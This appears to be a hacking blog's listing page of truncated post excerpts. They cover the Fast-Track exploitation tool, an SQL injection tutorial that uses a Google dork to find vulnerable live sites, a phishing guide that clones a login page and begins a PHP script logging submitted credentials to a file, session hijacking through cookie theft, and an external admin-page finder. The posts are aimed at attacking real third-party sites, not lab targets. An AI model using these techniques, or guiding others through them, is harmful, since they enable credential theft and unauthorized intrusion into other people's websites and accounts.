Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when a h4cker was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some advanced attacks and propagate it down , he ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride. Installing Fast-Track: mak...

Sql Injection tutorial advanced. So far in all the hacks the most used by h4ck3rs from n00b to an 1337 one has been the SQL injection attack. Here we at hackiteasy we present a tutorial on how to apply SQL injection to websites. This trick has been found to be working on a huge no. of sites. The hack starts as follows. Finding vulnerable site To find a vunerable site open google Type in a dork like "inurl:index.php?id=" (without quotes) there are many other similar formats for finding such vulnerable pages. Now click on any site like http://www.yoursite.com/index.php?id=786 Now to test if the siote is hackable or not add a ' at the end of the site. If the site gives an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'84' at line 1" we can assume that it is vunerable. If not try some other site. We have the vulnerable site now. So lets try with differe...

Phishing has become a very easy to use trick to hack usernames and passwords of users. Here demonstrate how to create a fake phishing page for almost any social networking site , email or any other site that has a login form. For this trick you would need a hosting account , you can get that easily. Register yourself at t35, host1free, 110mb etc. Note- 110mb checks for phishing page on their site and removes them. So now u have a hosting account so lets create a fake page- First go to the target site. In your browser select Save As from the File menu and save the site on  your hardisk with name "login.htm" . or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm". Now the second part of the hack- Go to Notepad and copy this into it- <?php header ('Location: http://www.facebook.com'); $handle = fopen("log.txt", "a"); foreach($_POST as...

In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft). Here we show how you can hack a session using javascript and php. What is a cookie? A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server. A cookie has a expiration time that is set by t...

A web site can easily be hacked if you know the hack the admin of the website. So for that you need to know the admin page of the website. And that could be a headache sometimes. So here is a page made by a hacker that works for you and searches the site for the admin page. http://sc0rpion.ir/af/ Just go to the site and enter the url of the site or blog followed by a  "/" and it would search for all those pages it thinks to be admin pages. Quite simple. How it works- The site has a huge list of commonly occurring admin pages common on the web. So the site just adds those one by one and tests whether and page by that name exists or not. If there is any admin page it would show up.